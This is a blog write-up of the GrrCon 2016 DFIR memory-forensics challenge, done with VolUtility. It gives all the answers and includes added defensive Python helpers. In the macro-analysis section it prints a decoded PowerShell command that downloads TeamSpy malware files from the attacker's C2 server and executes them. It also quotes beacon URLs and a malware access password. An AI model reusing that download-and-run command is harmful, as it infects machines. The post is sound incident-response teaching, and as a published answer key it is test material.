Solving GrrCon 2016 DFIR Challenge


It’s that time of year again and Wyatt Roersma has released the 2016 GrrCon DFIR Challenge. At the time of writing it’s still available to register and download the images from https://ir.e-corp.biz.

Once again, as these are memory images, I am going to try to solve the challenge solely using VolUtility. Word of warning: I reveal all the answers :p

For the answers I try to show you some of the process I go through, some of the wrong turns I make and the lessons I learned. However, there are some questions where I will take you straight to the right answer; if I were to cover every thought process I undertook and every wrong turn I made, this would be a much longer post. (And it’s already pretty long.)

Setup

I start with a vanilla build of VolUtility using the install guide on the wiki to get me going. I create a config file that contains my VirusTotal API key and set my usual list of plugins to run as soon as the session has been loaded.

  • pslist,psscan,netscan,cmdline,cmdscan,procdump,filescan,imageinfo

This time I can bulk load all (2) of the images in one go. It doesn’t take long before the images are ready for use, whilst my autorun plugins process away in the background.

Just tick the ‘Recursively add from Directory’ Tick box when adding a new session.

grrcon_2016_img_load

With the images ready, on with the questions.

On this fresh Thursday morning E Corp has contacted you to help them with their current incident response.

The CEO Phillip Price has requested that the use of any means necessary to catch the actors that released their secret plans with the government to back door the E Coin payment processing system for unlimited monitoring. The stock price has fallen by 50% since the leak by “guccifer 2.0” revealing emails between the CEO and the CTO about the plans. The IR team has acquired live response from the CEO’s system that showed “strange signs of infection” from his system for your expert analysis. PCAPs of the last few days have also been provided for additional context.

Question One (win7ecorpoffice2010-36b02ed3.vmem – 7i2wfWOO)

First lets find out what started the shit storm on his computer! What is the c2 address of the malware? (this case involves the host IP 10.1.1.122 of Phillip Price)

The challenge provides you with an extract of all the logs from a Security Onion instance that was running at the time, but I wanted to do all of this in memory. So first I used NETSCAN to identify which image had the local IP address 10.1.1.122. This was win7ecorpoffice2010-36b02ed3.vmem.

While we have NETSCAN open we can look for our answer. I start by looking for all ForeignAddr IPs. This gives me a handful, and the ones that jump out immediately are a trio of connections from SkypeC2AutoUpd.

The closed connection from -:0 to 120.122.236.3:0 is most likely not a valid data structure: no local address and port 0.

Answer: 54.174.131.235
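The same triage can be scripted. This is an added example (not code from the write-up or from VolUtility) that takes Volatility 2 NETSCAN text output, flags rows with no local address or a port of 0 as probable stale pool-scan hits, and groups the remaining foreign addresses per owning process with private ranges dropped. The NETSCAN rows embedded below are constructed for the example (only the C2 address, the local host and the truncated process name come from the write-up; offsets, PIDs and timestamps are made up); the column layout is the one Volatility 2 prints for TCP rows, and UDP rows, which carry no State column, are skipped.

```python
import ipaddress
import re
from collections import defaultdict

# Constructed sample of Volatility 2 netscan output. Offsets, PIDs and timestamps are invented;
# the local host and the C2 address are the ones discussed above.
SAMPLE_NETSCAN = """\
Offset(P)  Proto    Local Address    Foreign Address   State       Pid  Owner          Created
0x3e1a1c70 TCPv4    10.1.1.122:49162 54.174.131.235:80 ESTABLISHED 1364 SkypeC2AutoUpd 2016-10-12 08:01:00 UTC+0000
0x3e2b3d90 TCPv4    10.1.1.122:49163 54.174.131.235:80 CLOSED      1364 SkypeC2AutoUpd 2016-10-12 08:01:05 UTC+0000
0x3e2c4ea0 TCPv4    10.1.1.122:49164 54.174.131.235:80 ESTABLISHED 1364 SkypeC2AutoUpd 2016-10-12 08:01:09 UTC+0000
0x3e3d5fb0 TCPv4    -:0              120.122.236.3:0   CLOSED      1364 SkypeC2AutoUpd -
0x3e4e60c0 TCPv4    10.1.1.122:49170 10.1.1.5:445      ESTABLISHED 4    System         2016-10-12 07:55:00 UTC+0000
"""

# One TCP row: offset, proto, local, foreign, state, pid, owner (created time is ignored).
NETSCAN_ROW = re.compile(
    r"^(?P<offset>0x[0-9a-fA-F]+)\s+(?P<proto>TCPv[46])\s+"
    r"(?P<local>\S+)\s+(?P<foreign>\S+)\s+(?P<state>[A-Z_]+)\s+"
    r"(?P<pid>\d+)\s+(?P<owner>\S+)"
)


def split_endpoint(endpoint):
    """Split 'host:port' into (host, port); netscan prints '-' when the host is unknown."""
    host, _, port = endpoint.rpartition(":")
    return host, int(port)


def parse_netscan(text):
    """Turn netscan text into a list of dicts, skipping the header and non-TCP rows."""
    records = []
    for line in text.splitlines():
        m = NETSCAN_ROW.match(line.strip())
        if not m:
            continue
        rec = m.groupdict()
        rec["local_host"], rec["local_port"] = split_endpoint(rec["local"])
        rec["foreign_host"], rec["foreign_port"] = split_endpoint(rec["foreign"])
        rec["pid"] = int(rec["pid"])
        records.append(rec)
    return records


def is_suspect_record(rec):
    """Pool-scanned structures may be stale or partly overwritten: no local address or port 0."""
    return rec["local_host"] == "-" or rec["local_port"] == 0 or rec["foreign_port"] == 0


def external_foreign_addrs(records):
    """Map owner -> sorted routable foreign IPs, skipping suspect rows and non-global ranges."""
    result = defaultdict(set)
    for rec in records:
        if is_suspect_record(rec):
            continue
        try:
            ip = ipaddress.ip_address(rec["foreign_host"])
        except ValueError:
            continue
        if not ip.is_global:
            continue
        result[rec["owner"]].add(str(ip))
    return {owner: sorted(ips) for owner, ips in result.items()}


if __name__ == "__main__":
    recs = parse_netscan(SAMPLE_NETSCAN)
    for r in recs:
        if is_suspect_record(r):
            print("suspect row:", r["local"], "->", r["foreign"])
    print(external_foreign_addrs(recs))
```

Filtering out the non-routable ranges is what makes the list short enough to eyeball; the suspect-row check keeps the -:0 entry from being mistaken for a second C2 address.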

Question Two

What is the User Agent string of the malware?

There are a couple of ways we can get this information. If the malware is making HTTP requests it’s got to have this information in its process memory. Open the PSLIST plugin, filter for the Skype process and then right-click export process memory.

grrcon_2016_q1_a

After a short time the spinner should disappear and we can check for our data under the MEMDUMP plugin output.

From the MEMDUMP plugin output select ‘File Details’ in the row that matches our file.

From here we can select the strings tab, extract the strings, then download and open them in your editor of choice. I used the IP address from question one as my first search and found the answer within the first couple of hits.

grrcon_2016_q2_b

 

Answer: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.116 Safari/537.36

Question Three

What is the AV common name for the delivered malware? (Case doesn’t matter some times there is more than one name used by av vendors so try alt names if you’re sure or message me) Example: darkrat

I’m not sure how I actually got the answer for this. After the portal kept telling me I got the answer wrong, I would log back in a day later to find it marked as correct.

For me getting the common name is done by submitting the sample to VT and looking at the vendor names. In VolUtility we can get the file by either dumping all Processes with DUMPPROC or we can check SCANFILES and save the file from the context menu there.

grrcon_2016_q3_a

Once we have the file we use the VirusTotal extension from the file details page and check our results. In this case there were no vendor detections on the file.

Turns out this seems to be a valid TeamViewer executable that has been renamed. There is a piece of malware that hijacks TeamViewer called TeamSpy. After reading a bit more about TeamSpy, you can identify whether TeamSpy was installed by looking for the presence of an avicap32.dll in the same directory as the executable file. This DLL is loaded using search order hijacking.

I run FILESCAN and DLLDUMP to look for the presence of this file and find it in the temp dir, which is the same directory as SkypeC2AutoUpdate.exe.

I follow a similar process with this DLL file: extract the file from FILESCAN, then use the VirusTotal extension under DUMPFILES and File Details to get common names.

grrcon_2016_q3_b

This didn’t help much and as I said I’m not sure how I answered this correctly. If you know please let me know in the comments below.

Answer: TeamSpy?

Question Four

What is the malware version?

This one threw me for a while; I was putting in version numbers from every executable I could find that looked like it was malware. It wasn’t until I was answering another question that I found the answer to this one.

Looking in the strings for the process memory I found the following HTTP POST string that contained the answer I was looking for.

/getinfo.php?id=528812561&stat=1&tout=10
=2&osv=6.1&osbd=7600&ossp=0.0&ulv=2&elv=0&rad=0&agp=1&devicea=0&devicev=0&uname=phillip.price&cname=WIN-191HVE3KTLO&vpn=0&tvrv=0.2.2.2

Answer: 0.2.2.2

Question Five

What is the password the malware used to enable remote access to the system?

I actually found this answer at the same time as Q2, where I found the User Agent. I found it in what appears to be a configuration block for the malware.

grrcon_2016_q5_a

Answer: P59fS93m

Question Six

What was the sender email address that delivered the phishing email?

These email questions were an absolute pain, and they prompted me to modify a small section of VolUtility and to create a new extension.

Outlook.exe is an open process, so I can dump strings from the running process and check for emails in there. This is similar to what I did for the GrrCon 2015 challenge. There is, however, a better way. When Outlook is loaded, so are the PST files. These contain all the information I could possibly need.

I used FILESCAN and the store file context menu option to save all. No matter what I tried I couldn’t get a PST file that would parse correctly. Turns out there is an option with the Volatility DUMPFILES plugin that helps: the ‘unsafe’ option. I have modified the dumpfiles method in VolUtility to always use the unsafe option by default.

I have also added the option to find and save files by regex from the WebUI.

grrcon_2016_q6_a

Once you have the PST files stored in the VolUtility database using either method you can download them and parse them with something like pffexport. Some PST files will be more ‘complete’ than others but eventually you will find an email that looks suspicious.

grrcon_2016_q6_b

You may notice that the emails are being displayed inside the VolUtility interface. If you check out the develop branch of VolUtility you will find the initial extension that adds libpff support to the interface. To get here just select PST Viewer from the file details page.

Answer: karenmiles@t-online.de

Question Seven

What is the MD5 hash of the maldoc?

This is where it was even more important to use that unsafe option. Without it I could not get a valid attachment to fall out of pffexport.

We use the same method as in question six: run pffexport against the PST file we carved out and look for the email and its attachment.

We find bank_statement_088452.doc, at which point it’s a simple download and md5sum.

Answer: c2dbf24a0dc7276a71dd0824647535c9

Question Eight

What is the ID given to the system by the malware for remote access? (9 digit number no spaces assigned to the remote access tool)

Again, this is one we already have the answer for in the strings output for SkypeC2AutoUpdate.exe.

The same HTTP POST data that gave us the version number also gives us the ID:

/getinfo.php?id=528812561&stat=1&tout=10
=2&osv=6.1&osbd=7600&ossp=0.0&ulv=2&elv=0&rad=0&agp=1&devicea=0&devicev=0&uname=phillip.price&cname=WIN-191HVE3KTLO&vpn=0&tvrv=0.2.2.2

Using this ID as a pivot point also reveals some other potentially interesting information.

  • CT.Receive.CMD_DISCONNECT From=337037534 To=528812561 L=4
  • CmdPingRouter(): Router Pong Received with following Hops: 528812561 167491575
  • ttp://www.teamviewer.com/ru/licensing/update.aspx?id=528812561&ic=1239368&pid=noncommdialog

Answer: 528812561
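Questions two, four and eight all come out of the same strings dump, so pulling them out can be done in one pass. The following is an added example (not code from the write-up) that scans strings output for HTTP request lines, decodes the getinfo.php query string with the standard library, picks out the User-Agent header, and lists the other 9-digit IDs that appear alongside the host’s own ID in From=/To= log lines. The sample lines are constructed: the field values are the ones quoted above, but the surrounding line layout and the Host header are assumptions about how the request sits in memory.

```python
import re
from urllib.parse import parse_qsl, urlsplit

# Constructed sample of lines as they might appear in a strings dump of the process memory.
# Field values are the ones quoted in the write-up; the line layout and Host header are assumed.
SAMPLE_STRINGS = """\
kernel32.dll
POST /getinfo.php?id=528812561&stat=1&osv=6.1&osbd=7600&uname=phillip.price&cname=WIN-191HVE3KTLO&vpn=0&tvrv=0.2.2.2 HTTP/1.1
Host: 54.174.131.235
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.116 Safari/537.36
Content-Type: application/x-www-form-urlencoded
CT.Receive.CMD_DISCONNECT From=337037534 To=528812561 L=4
"""

REQUEST_LINE = re.compile(r"^(?P<method>GET|POST)\s+(?P<target>/\S+)\s+HTTP/1\.[01]$")
USER_AGENT = re.compile(r"^User-Agent:\s*(?P<ua>.+)$")
TV_ID_MENTION = re.compile(r"\b(From|To)=(\d{9})\b")


def find_requests(text):
    """Every HTTP request line found in the strings output, as {'method', 'target'} dicts."""
    return [m.groupdict() for m in (REQUEST_LINE.match(l.strip()) for l in text.splitlines()) if m]


def parse_beacon(target):
    """Decode a request target's query string into a dict (last value wins on duplicate keys)."""
    parts = urlsplit(target)
    return {"path": parts.path, **dict(parse_qsl(parts.query, keep_blank_values=True))}


def find_user_agents(text):
    """Distinct User-Agent header values seen in the strings output."""
    return sorted({m.group("ua") for m in (USER_AGENT.match(l.strip()) for l in text.splitlines()) if m})


def beacon_summary(text):
    """The fields that answer 'which ID / which version' from the first getinfo.php beacon."""
    for req in find_requests(text):
        fields = parse_beacon(req["target"])
        if fields["path"].endswith("/getinfo.php"):
            return {
                "id": fields.get("id"),
                "version": fields.get("tvrv"),
                "user": fields.get("uname"),
                "host": fields.get("cname"),
            }
    return None


def related_ids(text, own_id):
    """Other 9-digit IDs that share a From=/To= pair with the host's own ID: the pivot used above."""
    ids = set()
    for line in text.splitlines():
        found = {m.group(2) for m in TV_ID_MENTION.finditer(line)}
        if own_id in found:
            ids |= found - {own_id}
    return sorted(ids)


if __name__ == "__main__":
    summary = beacon_summary(SAMPLE_STRINGS)
    print(summary)
    print(find_user_agents(SAMPLE_STRINGS))
    print(related_ids(SAMPLE_STRINGS, summary["id"]))
```

Using parse_qsl rather than a hand-written split means percent-encoded values are decoded for you, which matters once the beacon carries a username or hostname with characters outside the plain ASCII set.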

Question Nine

What is the IPv4 address the actor last connected to the system with the remote access tool?

I got this one purely by process of elimination. I was looking for TeamViewer logs that would show the last connection. It’s supposed to look something like this:

CT.Receive.CMD_UDPPING From=932536226 To=316426335 L=80
GWT.CmdUDPPing.PunchReceived, a=192.168.1.100, p=1565

I could find some partial logs in memory, but they didn’t contain any IPs and there was nothing in a memory-mapped file.

I used a regex to pull all ‘IPs’ from the process memory and tried them one at a time. Eventually I got it flagged as correct with the IP 31.6.13.155.

Now that I had the answer I wanted to find out how you should get to it. I couldn’t figure it out. I ran almost every plugin, pulled strings, grepped the raw memory, and I could only find it twice in seemingly random data.

Answer: 31.6.13.155
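The regex approach described above works better when the candidate list is cut down before anything is tried by hand. This added example (not code from the write-up) runs an IPv4 regex over raw process memory, rejects octets outside 0 to 255, drops private, loopback and other non-routable ranges, counts occurrences, and returns the bytes around each hit so the analyst can judge whether it sits in a log line or in noise. The memory blob is constructed: the addresses in it are the ones mentioned on this page, and the binary filler around them is made up.

```python
import ipaddress
import re
from collections import Counter

# Constructed stand-in for a slice of process memory. The addresses are the ones mentioned in
# the write-up; everything around them is invented filler.
SAMPLE_MEMORY = (
    b"\x00\x00GWT.CmdUDPPing.PunchReceived, a=192.168.1.100, p=1565\x00"
    b"http://54.174.131.235/files/tv_w32.dll\x00tvrv=0.2.2.2\x00"
    b"\xde\xad31.6.13.155\x13\x37garbage999.1.1.1 10.1.1.122:49162\x00"
    b"\xff\xfe31.6.13.155\x00version 6.1.7600.0\x00127.0.0.1\x00"
)

# Four dotted groups of 1-3 digits, not glued to more digits or dots on either side.
IPV4_RE = re.compile(rb"(?<![\d.])(?:\d{1,3}\.){3}\d{1,3}(?![\d.])")


def extract_ipv4_candidates(data, include_private=False):
    """Return [(ip, count), ...] ordered by frequency, then address.

    The regex alone accepts '999.1.1.1' and version strings such as '0.2.2.2';
    IPv4Address() rejects the first and the routability check removes the second.
    """
    counts = Counter()
    for m in IPV4_RE.finditer(data):
        text = m.group().decode("ascii")
        try:
            ip = ipaddress.IPv4Address(text)
        except ValueError:
            continue
        if not include_private and not ip.is_global:
            continue
        counts[str(ip)] += 1
    return sorted(counts.items(), key=lambda kv: (-kv[1], kv[0]))


def context_for(data, ip, width=24):
    """Bytes surrounding every occurrence of ip, so each hit can be checked by eye."""
    needle = ip.encode("ascii")
    out, start = [], 0
    while True:
        idx = data.find(needle, start)
        if idx < 0:
            return out
        out.append(data[max(0, idx - width): idx + len(needle) + width])
        start = idx + len(needle)


if __name__ == "__main__":
    for ip, count in extract_ipv4_candidates(SAMPLE_MEMORY):
        print(f"{ip:<16} x{count}")
        for chunk in context_for(SAMPLE_MEMORY, ip):
            print("   ", chunk)
```

On a real dump the routable list is still long, so the count and the context are what separate a logged peer from a stray byte pattern; the write-up’s observation that the answer appeared only twice in random-looking data is exactly the case where the context view earns its keep.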

Question Ten

What is the PID the malware is running under?

Easy, we had this from the beginning: PSLIST for SkypeC2AutoUpdate.exe.

Answer: 1364

Question Eleven

What is the bit coin wallet # that a ransom was demanded for?

This one is back to the PST. Looking through the emails we can see one talking about a ransom to prevent a DDoS attack.

grrcon_2016_q11_a

Answer: 25UMDkGKBe484WSj5Qd8DhK6xkMUzQFydY

Question Twelve

What macro execution method does this document use?

We have the document from an earlier question, so now it’s just a matter of extracting the macro and analysing it.

I have spent a lot of time in my day job extracting macros from Office documents, so last year I stood up a small web service that automates the process for you. This service makes use of the excellent oletools kit by @decalage2 and can be found at https://macro.malwareconfig.com

Simply upload your document and then download the resulting text file that contains all the macro code.

grrcon_2016_q12_a

Looking at the macro, it is horribly obfuscated. Thankfully, for this question at least, we are just looking at execution flow, so we don’t need to fully understand what’s going on.

I started looking for the normal AutoExec methods but even oletools had not found anything.

I started looking through the code to find the ‘first’ procedure: one that calls others but is not called by anything itself.

Turns out it’s right at the top: Public Sub Img_Painted. This sub calls another sub which eventually starts the infection process, but is never called itself. As this is at the top of the execution flow, it must be the one that starts the whole process.

Img_Painted is the ‘Painted’ event of an ActiveX control: https://msdn.microsoft.com/en-us/library/aa510893.aspx?f=255&MSPPError=-2147217396

Answer: Img_Painted
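The ‘find the procedure nobody calls’ step can be automated over the macro text that oletools (or the service above) hands back. The following is an added example, not the author’s code and not part of oletools: it parses Sub/Function definitions, builds a word-match call graph, reports procedures that are never referenced, ranks known auto-exec names and ActiveX-style Control_Event names ahead of plain dead code, and walks the call chain from a chosen entry. The VBA below is constructed to mirror the shape described in the write-up; Img_Painted, UsoJar and a() are the names from the page, the rest are made up, and the auto-exec and event-suffix lists are assumptions rather than complete catalogues.

```python
import re

# Constructed VBA sample mirroring the layout described above. Only Img_Painted, UsoJar and a()
# are names from the write-up; Stage1, Unused_Decoy and the XOR key are made up.
SAMPLE_VBA = '''
Public Sub Img_Painted(ByVal Index As Long)
    Call Stage1
End Sub

Private Sub Stage1()
    Dim cmd As String
    cmd = UsoJar()
    Shell cmd, vbHide
End Sub

Public Function UsoJar() As String
    UsoJar = a("QZ9k") & a("pp0r")
End Function

Private Function a(s As String) As String
    Dim i As Integer, out As String
    For i = 1 To Len(s)
        out = out & Chr(Asc(Mid(s, i, 1)) Xor 7)
    Next i
    a = out
End Function

Public Sub Unused_Decoy()
    MsgBox "nothing"
End Sub
'''

# One procedure: optional scope, Sub/Function, name, parenthesised args, body up to End Sub/Function.
PROC_RE = re.compile(
    r"^[ \t]*(?:(?P<scope>Public|Private)\s+)?(?P<kind>Sub|Function)\s+(?P<name>\w+)\s*\((?P<args>[^)]*)\)"
    r"(?P<body>.*?)^[ \t]*End\s+(?:Sub|Function)\b",
    re.S | re.M | re.I,
)

# Names Office runs by itself (assumption: a short list, not exhaustive).
AUTO_EXEC = {"autoopen", "autoexec", "autonew", "autoclose", "auto_open", "auto_close",
             "document_open", "document_close", "document_new", "workbook_open"}
# Event suffixes of form/ActiveX controls that fire without an explicit call (assumption: partial).
EVENT_SUFFIXES = {"painted", "click", "dblclick", "change", "layout", "mousemove", "scroll", "gotfocus"}


def parse_procedures(vba):
    """name -> {'kind', 'scope', 'body'} for every Sub/Function in the module text."""
    procs = {}
    for m in PROC_RE.finditer(vba):
        procs[m.group("name")] = {
            "kind": m.group("kind").capitalize(),
            "scope": (m.group("scope") or "Public").capitalize(),
            "body": m.group("body"),
        }
    return procs


def call_graph(procs):
    """name -> set of other procedures whose name appears as a whole word in its body."""
    return {
        name: {other for other in procs
               if other != name and re.search(rf"\b{re.escape(other)}\b", info["body"], re.I)}
        for name, info in procs.items()
    }


def classify_entry(name):
    lower = name.lower()
    if lower in AUTO_EXEC:
        return "auto-exec"
    control, sep, event = lower.rpartition("_")
    if sep and control and event in EVENT_SUFFIXES:
        return "activex-event"
    return "unreferenced"


def entry_point_candidates(vba):
    """Procedures nothing else calls, most likely trigger first."""
    procs = parse_procedures(vba)
    graph = call_graph(procs)
    called = set().union(*graph.values())
    order = {"auto-exec": 0, "activex-event": 1, "unreferenced": 2}
    candidates = [(name, classify_entry(name)) for name in procs if name not in called]
    return sorted(candidates, key=lambda nc: (order[nc[1]], nc[0]))


def execution_chain(vba, start):
    """Depth-first walk of the call graph from an entry point: the execution flow the question asks for."""
    graph = call_graph(parse_procedures(vba))
    seen, chain, stack = set(), [], [start]
    while stack:
        cur = stack.pop()
        if cur in seen or cur not in graph:
            continue
        seen.add(cur)
        chain.append(cur)
        stack.extend(sorted(graph[cur], reverse=True))
    return chain


if __name__ == "__main__":
    print(entry_point_candidates(SAMPLE_VBA))
    print(" -> ".join(execution_chain(SAMPLE_VBA, "Img_Painted")))
```

Word matching is deliberately crude: obfuscated macros that build procedure names at runtime (CallByName, Application.Run with a string) will not show up as edges, so a candidate list that is empty or suspiciously long is a cue to look for those constructs rather than to trust the graph.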

Question Thirteen

What is the last Teamviewer account name the attacker uses?

Once again back to the strings output from the SkypeC2AutoUpdate.exe process.

As I was looking through the strings to identify the ID from Question Eight, I had searched for the TeamViewer ID, which is in the format (ddd ddd ddd).

I found this along with a weird name:

  • fuckyourbears (337 037 534)

This is our answer:

Answer: fuckyourbears

Question Fourteen

What file got stolen that was used in the leak of the secret backdoor project? (the data stolen actually contains information about planting a backdoor for government monitoring that was only ever communicated over email)

Another one I got without actually knowing how I got it! It was talking about emails, so I spent a lot of time looking for emails or documents that made reference to stolen data.

I couldn’t find anything. I had a random thought that maybe they had exfiltrated the PST files, as they would contain emails and it says they were only ever in emails.

outlook.pst was the answer that was accepted, and I don’t know why. After this answer was marked as correct I tried to export the PST files and see what was inside that would have pointed me in the right direction, but as far as I can tell the outlook.pst files are all essentially empty.

If you know what I am missing here please let me know.

Question Fifteen

What Public Function in the word document returns the full command string that is eventually run on the system?

OK, looks like we have to deobfuscate the macro after all. As I said in the previous macro question, I have spent a lot of time in my day job doing this, so some of this is more obvious to me than it may be for you.

Looking through the macro code you see lots of random strings that are passed to a single function, a.

grrcon_2016_q15_a

This is where all the important bits of information are. This is a typical obfuscation technique: a function that converts characters to integers, runs some kind of XOR / mathematical routine, then turns the resulting integer back into a character.

I used to try converting the maths into Python, but the maths was slightly different every time and this proved to be more time-consuming.

Then I remembered one of my favourite sites for analysing .NET malware: https://dotnetfiddle.net/ This site allows you to paste in code, including VB, and execute it in real time. This is far easier than trying to convert to Python or just executing the macro in a sandbox. This way I don’t need a sandbox.

I copy out the functions that form the obfuscation routine, starting with a(). Then it’s just a matter of copying and pasting dependent functions as required.

The result is something like this – https://dotnetfiddle.net/YNtLOZ

grrcon_2016_q13_a

I added a Console.WriteLine(a) into the decode routine to print out the clear text, and then it’s just a matter of copying in each of the encoded strings and running the fiddle.

I can see the PowerShell line that is called, and the base64 string comes back as:

foreach ($i in @("SkypeC2AutoUpdate.exe","TeamViewer_Desktop.exe","TeamViewer_Resource_en.dll","avicap32.dll","tv_w32.dll","tv_w32.exe","tv_x64.dll","tv_x64.exe","tvr.cfg","vpn.exe")){(New-Object System.Net.WebClient).DownloadFile("http://54.174.131.235/files/$i", "$env:temp/$i")};Start-Process -FilePath "$env:TEMP/SkypeC2AutoUpdate.exe" -WorkingDirectory "$env:TEMP"

This seems to be the command string, and it was found in the function UsoJar().

Answer: UsoJar

Question Sixteen (ecorpwin7-e73257c4.vmem – 1X6IW0yD)

What is the maldoc md5hash?

I started using the same method as I had with the previous level: trying to extract from the PST. With or without the unsafe flag I couldn’t get the attachment hash to match the answer. There was a chunk of random data sat in the middle of the file when trying to extract. I could get this cleaned up enough to run, but not enough to get the correct MD5.

I checked to see if the file was mapped in memory. It was, so I used the same method as normal to save this file: the right-click context menu from FILESCAN.

grrcon_2016_q16_a

This didn’t give me the right answer at first. I opened the file in a hex editor to check the content and noticed a lot of trailing null bytes (\x00). After trimming all of these away and using md5sum I had the correct answer.

Answer: 00e4136876bf4c1069ab9c4fe40ed56f
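The trailing-null problem is general: a file object rebuilt from the cache is written out in page-sized chunks, so its tail is typically zero-padded to a 4 KiB boundary even though the real file ends earlier. This added example (not code from the write-up or from Volatility) computes both the raw and the null-trimmed MD5 of a carved blob, reports how much padding was removed, and flags whether the blob ends exactly on a page boundary, which is the tell for cache padding. The sample blob is constructed (an OLE2 magic header plus filler) and is not the challenge document.

```python
import hashlib

PAGE = 4096  # x86 memory pages are 4 KiB; a cache-carved file usually ends on a page boundary

# Constructed stand-in for a carved document: OLE2 magic header plus filler, then nulls up to
# a page boundary the way a file saved from the cache often looks. Not the challenge file.
SAMPLE_CONTENT = b"\xd0\xcf\x11\xe0\xa1\xb1\x1a\xe1" + b"A" * 100
SAMPLE_CARVED = SAMPLE_CONTENT + b"\x00" * (PAGE - len(SAMPLE_CONTENT))


def md5_hex(data):
    return hashlib.md5(data).hexdigest()


def strip_trailing_nulls(data):
    """Remove the run of 0x00 bytes at the end of the blob, if any."""
    return data.rstrip(b"\x00")


def looks_page_padded(data):
    """True when the blob ends exactly on a page boundary and finishes with null bytes."""
    return len(data) % PAGE == 0 and data.endswith(b"\x00")


def candidate_hashes(data):
    """Both hashes an analyst should try on a carved file, plus why they might differ."""
    trimmed = strip_trailing_nulls(data)
    return {
        "raw": md5_hex(data),
        "trimmed": md5_hex(trimmed),
        "padding_bytes": len(data) - len(trimmed),
        "page_padded": looks_page_padded(data),
    }


def hash_carved_file(path):
    """Same report for a file on disk, e.g. one saved from the FILESCAN context menu."""
    with open(path, "rb") as fh:
        return candidate_hashes(fh.read())


if __name__ == "__main__":
    for key, value in candidate_hashes(SAMPLE_CARVED).items():
        print(f"{key:>14}: {value}")
```

Keep both hashes: a file whose genuine content ends in null bytes (OLE2 files are sector-aligned and can end that way) would be over-trimmed, so when neither value matches, the next step is to derive the true length from the file format rather than to strip more.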

Question Seventeen

What is the common name of the malware that gets loaded?

We need to find the malware in order to answer this. There were no processes that jumped out as being nasty and nothing listed in MALFIND. NETSCAN showed a handful of connections to an IP address on port 80. Seems like a good place to start.

grrcon_2016_q17_a

The CMDLINE plugin shows the command line that was used to start each process on the box. This is incredibly useful for identifying how DLL files and services were started. This example is no exception.

grrcon_2016_q17_b

With the name of the file I run FILESCAN to see if the file exists in memory. It does, so I store the file object using the context menu and scan the file with the VirusTotal extension.

grrcon_2016_q17_c

The common name seems to be Korplug, which a quick Google will reveal is the alternative name for the PlugX family of malware.

Answer: PlugX

Question Eighteen

What password does the attacker use to stage the compressed file for exfil?

Once a box is infected, it’s typically command line tools that are used for post-exploitation actions. One of my favourite places to look for this kind of activity, after checking CMDSCAN and the command lines, is in the strings of conhost.exe.

I dump the process memory and process the strings. I’m looking for compressed files so I start with a search for .rar. I get a couple of hits and my answer is there as well.

grrcon_2016_q18_a

Answer: password1234

Question Nineteen

What is the IP address of the c2 server for the malware?

We identified this when we located the malware svchost connecting out to 52.90.110.169.

Answer: 52.90.110.169

Question Twenty

What email address sent the phishing email?

We had this earlier when we were looking for the maldoc. It’s the only email that contains an attachment. We can dump the PST using any of the methods described earlier and run the PST through a parser like pffexport, or, if you’re using the develop branch of VolUtility, just open the PST Viewer tab from the file details page to get the answer.

Answer: lloydchung@allsafecybersec.com

Question Twenty One

What is the name of the deb package the attacker staged to infect the E Coin Servers? (Include the full path of the package)

As with question 18, I’m expecting this level of infiltration to be from the command line, so I look in the strings output from conhost and search for .deb.

This reveals my answer:

grrcon_2016_q21_a

Answer: files.allsafecybersec.com/av/linuxav.deb

Well that concludes another GrrCon Memory Challenge. I always enjoy these, I learn a lot and it drives me to keep developing tools.

There were a couple of things I didn’t like in a couple of the questions, and the order of the questions didn’t feel natural. For example, the macro questions were not together, and neither were the email questions.

Other than that I thoroughly enjoyed the challenge and I look forward to the next one :)

As usual: questions, queries and comments below.

 


  • Kyle Hanslovan

    Curious why 54.174.131.235 showed up as a “ForeignAddr”? Looks a lot like AWS US East (N. Virginia) to me.

    • Kevin Breen

      ForeignAddr is just how Volatility displays the remote host. The IP country name is a custom extension I added that uses the MaxMind GeoIP City database, so it’s only as accurate as the time it was run. Hope this explains it.

      • Kyle Hanslovan

        Awesome, thanks for the clarification!

  • 8iggy

    Q12. I thought the reason would be in the question: they said “it was only ever communicated over email”. So, to leak information about the backdoor, the actor had to steal email content. As you know, a PST file is a package of Outlook emails. In conclusion, as this scenario only dealt with Outlook mail, the flag would be outlook.pst.
    Thank you for the good write-up ‘-^